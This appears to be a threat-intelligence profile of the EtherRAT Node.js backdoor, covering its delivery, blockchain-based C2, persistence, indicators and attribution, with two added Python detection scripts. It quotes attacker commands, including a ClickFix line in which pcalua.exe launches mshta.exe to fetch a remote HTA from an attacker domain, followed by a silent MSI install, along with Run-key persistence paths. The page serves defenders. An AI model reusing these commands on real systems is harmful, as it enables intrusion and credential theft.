EtherRAT
EtherRAT is a Node.js-based remote access trojan/backdoor that has been observed on both Linux and Windows. It was first reported in December 2025 in React2Shell (CVE-2025-55182) exploitation against Linux servers, where it was delivered through shell scripts that downloaded a legitimate Node.js runtime, decrypted staged JavaScript payloads, and established persistence via systemd, XDG autostart entries, crontab, .bashrc, and .profile. On Windows, later campaigns delivered EtherRAT through malicious MSI installers, including trojanized IT tools such as Tftpd64 and fake GitHub repositories impersonating administrative utilities like PsExec, AzCopy, Sysmon, LAPS, Kusto Explorer, RAMMap, and others. Additional reporting also described distribution via PowerShell and JavaScript scripts, open directories, and ClickFix-driven chains using the Potemkin loader.
A core characteristic of EtherRAT is blockchain-based command-and-control discovery. Multiple reports state that it retrieves or resolves its live C2 address from the Ethereum blockchain using public Ethereum RPC endpoints, making traditional domain takedown and IP blocking less effective. Reported Ethereum-related indicators include smart contract addresses 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4, 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58, 0xb3f2897f2bc797e5b9033faef8c81e92b01cb831, and 0xc12c8d8f9706244eca0acf04e880f10ff4e52522, with associated storage/lookup values including 0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D and 0x40b57c3622c1CbfD699207F71F2dE5A8Fe256893. Observed live or resolved C2 infrastructure included 91.215.85.42:3000, resumeacceptable[.]com, and domains such as wpuadmin[.]shop. Samples used randomized polling paths under /api/ with common static-content extensions and in some cases an X-Bot-Server header. Reported build IDs include 6f816d80-0d6c-4384-9cd6-6b79965fc08f and ab653feb-9e78-4578-87ed-2e30329fe858.
Functionally, EtherRAT gives an operator full control of an infected machine and can execute arbitrary JavaScript or code returned by its C2. Reported behaviors include host reconnaissance, collection of system locale, GPU details, antivirus products, Active Directory domain membership, MachineGuid values, logged-in session status, and other environment details. Some analyses observed self-reobfuscation or self-update behavior in which the malware sent its own source code to the server and overwrote itself with a newly obfuscated version, causing hash churn. Windows variants commonly persisted through HKCU\Software\Microsoft\Windows\CurrentVersion\Run and launched via conhost.exe --headless invoking node.exe with obfuscated payload files; Linux variants used multiple user-level persistence mechanisms.
Follow-on payloads delivered through EtherRAT have included scripts for host reconnaissance, credential and wallet theft, React2Shell scanning and exploitation, web-server hijacking, and SSH key persistence. One reported JavaScript stealer collected cryptocurrency wallets, SSH keys, cloud credentials, tokens, database secrets, and browser-stored data from Windows and Linux systems, with exfiltration to /crypto/keys on its C2. In enterprise intrusions, EtherRAT was also used alongside other tooling such as Potemkin, RMMProject, TukTuk, Cloudflare tunnels, Chisel, WMIExec, SMBExec, and ransomware deployment chains. Reporting states that attackers spread EtherRAT laterally to more than 11 hosts in at least one Windows intrusion and ultimately disabled Windows Defender.
Targeting described in the reporting includes Linux servers vulnerable to React2Shell, enterprise administrators, DevOps engineers, security analysts, IT administrators, and network professionals. Industries and victims mentioned across reporting include insurance, e-commerce, IT, manufacturing, logistics, and broader enterprise environments. Several sources describe targeted attacks rather than indiscriminate commodity deployment.
Attribution remains mixed and should be treated cautiously. Sysdig reported a possible North Korean-linked actor and noted tradecraft overlap with DPRK Contagious Interview tooling and BeaverTail-style loaders. Other reporting described the campaigns as suspected of being linked to a DPRK APT. Separately, Atos referenced external reporting that linked EtherRAT or related EtherHiding logic to Lazarus-associated activity and noted code commonalities with Tsundere malware found in infrastructure attributed by eSentire to MuddyWater (APT34). These links are reported assessments rather than definitive attribution in the underlying reporting.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The threat actors leveraged the CVE-2025-55182 (React2Shell) vulnerability... React2Shell is a vulnerability in the Flight protocol, which facilitates client-server communication for React Server Components. The vulnerability stems from insecure deserialization... Under certain conditions, this can enable an attacker to execute arbitrary code on the server. | Additionally, React2Shell attacks were recorded to distribute new EtherRAT malware, which was previously analyzed by Sysdig Threat Research Team.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
A multi-stage attack chain distributing ransomware following a Malware infection with EtherRAT and TukTuk malware was identified, and some attack methods and infrastructure were exposed through internal leaks.
Ultimately, Atos Researchers identified it to be an EtherRat malware, a recently emerging threat using Ethereum to store C2 URL addresses, preventing takedown of the infrastructure.
this payload, dubbed EtherRAT, represents something far more sophisticated. It is a persistent access implant that combines techniques from at least three documented campaigns into a single, previously unreported attack chain.
“this payload, dubbed EtherRAT… is a persistent access implant… EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution…”
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniques
The first mechanism was a scheduled task to retrieve and execute EtherRAT called msiInstall2... The attacker then established a second scheduled task named ekShell2
File Path: C:\Windows\Temp\D0OK1nWwId9W.ps1 (first malicious PowerShell script dropped) ... File Path: C:\ProgramData\p\fsjH6IHuUkhh.ps1 (AMSI bypass + Defender registry disable + reflective Chisel load)
cmd /min /c "pcalua.exe -a mshta.exe -c hxxps://cl.distritovagas.com/hte[.]hta"
RlLF3rizah.ini is the loader JavaScript, MseKOytIWeVrP85.xml is the encrypted payload... Decrypting MseKOytIWeVrP85.xml with the cipher above yields the payload: EtherRAT, a Node.js backdoor.
ClickFix is a social engineering trick that presents users with a fake troubleshooting instruction on a compromised website. The prompt tells the user to press Win+R, paste a command into the Windows Run dialog, and hit Enter.
The attack started with a ClickFix command that abused pcalua.exe to proxy mshta.exe, fetching a remote HTA file from cl.distritovagas[.]com. That HTA payload silently downloaded the MSI installer, inst24.msi, from an attacker-controlled server and executed it without any prompt.
Persistence
3 techniques
The first mechanism was a scheduled task to retrieve and execute EtherRAT called msiInstall2... The attacker then established a second scheduled task named ekShell2
They cycled through AMSI patches, registry policy writes... File Path: C:\ProgramData\p\ek_full.ps1 (registry-based Defender disable script)
The MSI deployed Potemkin into the user’s AppData folder and registered a startup registry key so it would survive every reboot. ... Registry Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch (Potemkin loader persistence key) ... HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate (EtherRAT persistence key)
Privilege Escalation
2 techniques
The first mechanism was a scheduled task to retrieve and execute EtherRAT called msiInstall2... The attacker then established a second scheduled task named ekShell2
The MSI deployed Potemkin into the user’s AppData folder and registered a startup registry key so it would survive every reboot. ... Registry Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearch (Potemkin loader persistence key) ... HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate (EtherRAT persistence key)
Stealth
8 techniques
MseKOytIWeVrP85.xml is the encrypted payload... Potemkin protects two categories of strings with a custom byte cipher
After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash.
The Cloudflare cloudflared client, renamed to svchost.exe to pose as a Windows process... Persistence was registered under the user Run key ... EdgeUpdate
The dc() function reads MseKOytIWeVrP85.xml and decrypts it into JavaScript with a custom byte cipher
The HTA payload hides its window, uses WScript.Shell to run curl silently downloading an MSI from an attacker-controlled domain... then executes it via msiexec /qn for silent installation.
Defense Impairment
1 technique
Discovery
4 techniques
After the EtherRAT execution, we observed different post-compromise cmd.exe activities to check the environment. For example: powershell ... “(Get-WmiObject Win32_VideoController).Name” ... “(Get-WmiObject Win32_ComputerSystem).Domain” ... “(Get-WmiObject Win32_ComputerSystem).PartOfDomain”
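The host-side behaviours quoted in the Execution, Persistence, Stealth and Discovery sections (the ClickFix chain of pcalua.exe proxying mshta.exe into a silent msiexec /qn install, the conhost.exe --headless launch of node.exe, the EdgeUpdate and RunSearch Run-key entries, the cloudflared client renamed to svchost.exe, and the Get-WmiObject host/domain checks) all survive the self-reobfuscation that makes file hashes churn, so they are the better hunting anchors. The script below is an added example written for this page, not code from the page or from any vendor report: it runs a small set of behavioural rules over constructed Sysmon-like process and registry events. The event field names, the rule thresholds and the sample paths are this example's assumptions; the file names, registry value names and defanged domain come from the quotes above, and the payload file name passed to node.exe is a placeholder.

```python
"""Behavioural triage rules for the EtherRAT/Potemkin host chain quoted above.

Added example for this page, not code from the page or any vendor report.
Event shape (kind/image/cmdline/parent/key/data) is a simplified Sysmon-like
model chosen for the example; thresholds and sample paths are assumptions.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
RUN_KEY = r"hkcu\software\microsoft\windows\currentversion\run"
URL_RE = re.compile(r"h(?:xx|tt)ps?://", re.IGNORECASE)   # also matches defanged hxxp(s)
SYSTEM_DIR_RE = re.compile(r"\\windows\\(system32|syswow64)\\")


@dataclass
class Event:
    kind: str            # "process" or "registry"
    image: str = ""      # full path of the created process
    cmdline: str = ""
    parent: str = ""     # parent image path
    key: str = ""        # registry key (registry events only)
    data: str = ""       # registry value data (registry events only)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    hits = []
    img, cmd, parent = basename(ev.image), ev.cmdline.lower(), basename(ev.parent)
    # ClickFix chain: pcalua.exe used as a proxy to launch mshta.exe
    if img == "pcalua.exe" and "mshta" in cmd:
        hits.append("pcalua_proxies_mshta")
    # mshta.exe fetching a remote HTA
    if img == "mshta.exe" and URL_RE.search(ev.cmdline):
        hits.append("mshta_remote_hta")
    # silent MSI install (/qn) spawned from a script host
    if img == "msiexec.exe" and "/qn" in cmd and parent in SCRIPT_HOSTS:
        hits.append("silent_msi_from_script_host")
    # EtherRAT launch pattern: conhost.exe --headless invoking node.exe
    if img == "conhost.exe" and "--headless" in cmd and "node" in cmd:
        hits.append("headless_conhost_node")
    # something named svchost.exe running outside the Windows system directories
    if img == "svchost.exe" and not SYSTEM_DIR_RE.search(ev.image.lower()):
        hits.append("svchost_outside_system_dir")
    # WMI GPU/domain recon: low confidence alone, correlate with the rules above
    if img in ("powershell.exe", "pwsh.exe") and "get-wmiobject" in cmd and \
            any(c in cmd for c in ("win32_videocontroller", "win32_computersystem")):
        hits.append("wmi_host_recon")
    return hits


def check_registry(ev):
    key, data = ev.key.lower(), ev.data.lower()
    if not key.startswith(RUN_KEY):
        return []
    # Run-key autostart pointing at node/conhost or at a user-writable path
    suspicious = ("node" in data or "conhost" in data
                  or "\\appdata\\" in data or "\\programdata\\" in data)
    return ["run_key_persistence_userpath"] if suspicious else []


def evaluate(events):
    """Return [(event_index, rule_name), ...] for every rule that fired."""
    findings = []
    for i, ev in enumerate(events):
        rules = check_process(ev) if ev.kind == "process" else check_registry(ev)
        findings.extend((i, r) for r in rules)
    return findings


# Constructed sample events mirroring the chain quoted on this page.
# "<payload>.js" is a placeholder; the real payload file names vary per sample.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\pcalua.exe",
          "pcalua.exe -a mshta.exe -c hxxps://cl.distritovagas[.]com/hte[.]hta",
          r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\mshta.exe",
          "mshta.exe hxxps://cl.distritovagas[.]com/hte[.]hta",
          r"C:\Windows\System32\pcalua.exe"),
    Event("process", r"C:\Windows\System32\msiexec.exe",
          r"msiexec /i C:\Users\victim\AppData\Local\Temp\inst24.msi /qn",
          r"C:\Windows\System32\mshta.exe"),
    Event("registry", key=r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate",
          data=r'conhost.exe --headless "C:\Users\victim\AppData\Roaming\node.exe" <payload>.js'),
    Event("process", r"C:\Windows\System32\conhost.exe",
          r'conhost.exe --headless "C:\Users\victim\AppData\Roaming\node.exe" <payload>.js',
          r"C:\Windows\explorer.exe"),
    Event("process", r"C:\ProgramData\p\svchost.exe",
          "svchost.exe tunnel run --token <redacted>", r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          'powershell "(Get-WmiObject Win32_ComputerSystem).PartOfDomain"',
          r"C:\Windows\System32\cmd.exe"),
    # benign control: the genuine svchost.exe from System32 must not fire
    Event("process", r"C:\Windows\System32\svchost.exe",
          "svchost.exe -k netsvcs", r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Run it on its own and it prints seven findings, one per malicious sample event and none for the genuine svchost.exe. The WMI rule is deliberately kept as a low-confidence signal: administrators run the same queries, so it is only worth paging on when it lands on a host that also tripped one of the execution or persistence rules.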
Lateral Movement
2 techniques
Command and Control
7 techniques
EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server.
For each candidate domain, Potemkin sends an HTTP GET request to a fixed URL path... EtherRAT enters an endless polling loop. Each request goes to a freshly randomized URL
Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared... A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave them layered persistence
A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave them layered persistence that could survive individual detections.
That script downloaded and installed an MSI package in the background with no visible indication to the user. Separately, the attacker deployed EtherRAT... Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared.
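Two network behaviours described on this page are worth hunting independently of any domain or IP: the Ethereum JSON-RPC lookups the summary above says EtherRAT uses to resolve its live C2 address (the smart contract addresses listed there are usable as indicators inside those requests), and the endless polling loop over randomized /api/ paths with static-content extensions, sometimes carrying an X-Bot-Server header. The script below is an added example written for this page, not code from the page or from any vendor: it runs both checks over a constructed proxy log. The log record shape, the static-extension set, the polling threshold and the RPC host name rpc.example-eth.invalid are this example's assumptions; the contract addresses and the 91.215.85.42:3000 destination are the values reported above.

```python
"""Network-side hunting for EtherRAT C2 behaviours described on this page.

Added example for this page, not code from the page or any vendor report.
The proxy-log JSON shape below is constructed for the example; STATIC_EXT,
POLL_THRESHOLD and rpc.example-eth.invalid are assumptions.
"""
import json
from collections import defaultdict

KNOWN_CONTRACTS = {  # Ethereum smart contract addresses from the reporting on this page
    "0x22f96d61cf118efabc7c5bf3384734fad2f6ead4",
    "0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58",
    "0xb3f2897f2bc797e5b9033faef8c81e92b01cb831",
    "0xc12c8d8f9706244eca0acf04e880f10ff4e52522",
}
STATIC_EXT = {".js", ".css", ".png", ".jpg", ".gif", ".ico", ".svg", ".woff"}  # assumption
POLL_THRESHOLD = 4  # distinct random /api/ paths to one destination (assumption)


def ethereum_rpc_findings(rec):
    """Flag Ethereum JSON-RPC calls; escalate when a known contract is referenced."""
    try:
        body = json.loads(rec.get("body") or "")
    except ValueError:
        return []
    if not isinstance(body, dict) or "jsonrpc" not in body:
        return []
    if not str(body.get("method", "")).startswith("eth_"):
        return []
    hits = ["ethereum_jsonrpc_from_host"]
    params = json.dumps(body.get("params", [])).lower()
    if any(addr in params for addr in KNOWN_CONTRACTS):
        hits.append("known_etherrat_contract")
    return hits


def _random_api_path(path):
    """True for '/api/<token>.<static-ext>' with no further directory component."""
    if not path.startswith("/api/"):
        return False
    name = path[5:].split("?", 1)[0]
    if "/" in name:
        return False
    dot = name.rfind(".")
    return dot > 0 and name[dot:].lower() in STATIC_EXT


def analyse(records):
    """Return a sorted list of (src, dst, rule) findings over proxy-log records."""
    findings = set()
    polls = defaultdict(set)  # (src, dst) -> distinct random /api/ paths seen
    for rec in records:
        src, dst = rec["src"], rec["dst"]
        for rule in ethereum_rpc_findings(rec):
            findings.add((src, dst, rule))
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        if "x-bot-server" in headers:
            findings.add((src, dst, "x_bot_server_header"))
        if rec.get("method") == "GET" and _random_api_path(rec.get("path", "")):
            polls[(src, dst)].add(rec["path"])
    for (src, dst), paths in polls.items():
        if len(paths) >= POLL_THRESHOLD:
            findings.add((src, dst, "randomized_api_polling"))
    return sorted(findings)


def load_records(text):
    """Parse newline-delimited JSON proxy records (the constructed shape used here)."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


# Constructed proxy log: one C2 resolution via eth_call against a reported contract,
# four polls with random /api/ names to a reported C2 endpoint (one with the header),
# and a benign single static fetch from another host that must not fire.
SAMPLE_LOG = r"""
{"src":"10.0.5.17","dst":"rpc.example-eth.invalid","method":"POST","path":"/","headers":{"Content-Type":"application/json"},"body":"{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"eth_call\",\"params\":[{\"to\":\"0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\",\"data\":\"0x\"},\"latest\"]}"}
{"src":"10.0.5.17","dst":"91.215.85.42:3000","method":"GET","path":"/api/k3j2h4.js","headers":{"X-Bot-Server":"1"},"body":""}
{"src":"10.0.5.17","dst":"91.215.85.42:3000","method":"GET","path":"/api/p9q1z.css","headers":{},"body":""}
{"src":"10.0.5.17","dst":"91.215.85.42:3000","method":"GET","path":"/api/b7n2m.png","headers":{},"body":""}
{"src":"10.0.5.17","dst":"91.215.85.42:3000","method":"GET","path":"/api/x1c8v.gif","headers":{},"body":""}
{"src":"10.0.5.22","dst":"cdn.example.invalid","method":"GET","path":"/api/app.js","headers":{},"body":""}
"""

if __name__ == "__main__":
    for src, dst, rule in analyse(load_records(SAMPLE_LOG)):
        print(f"{src} -> {dst}: {rule}")
```

The JSON-RPC rule is intentionally not tied to a list of RPC provider hosts: a server that has no wallet or blockchain role should not be issuing eth_call or eth_getStorageAt at all, so the method name alone is the signal, and the contract list only raises the confidence. The polling rule counts distinct paths rather than request volume, which is what separates the randomized beacon from a page that legitimately fetches the same /api/app.js repeatedly.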
IOCs tracked for this family
149 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
69 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote access trojan deployed later in the intrusion, associated here with follow-on compromise activity and disabling Windows Defender.
Remote access malware used in a multi-stage attack chain that preceded ransomware deployment.
A Node.js backdoor/RAT that retrieves its C2 server address from the Ethereum blockchain. It was spread to more than 11 hosts and used for persistent access, with registry-based persistence masquerading as an Edge updater.
A remote access trojan delivered by Potemkin and propagated laterally across multiple hosts after initial compromise.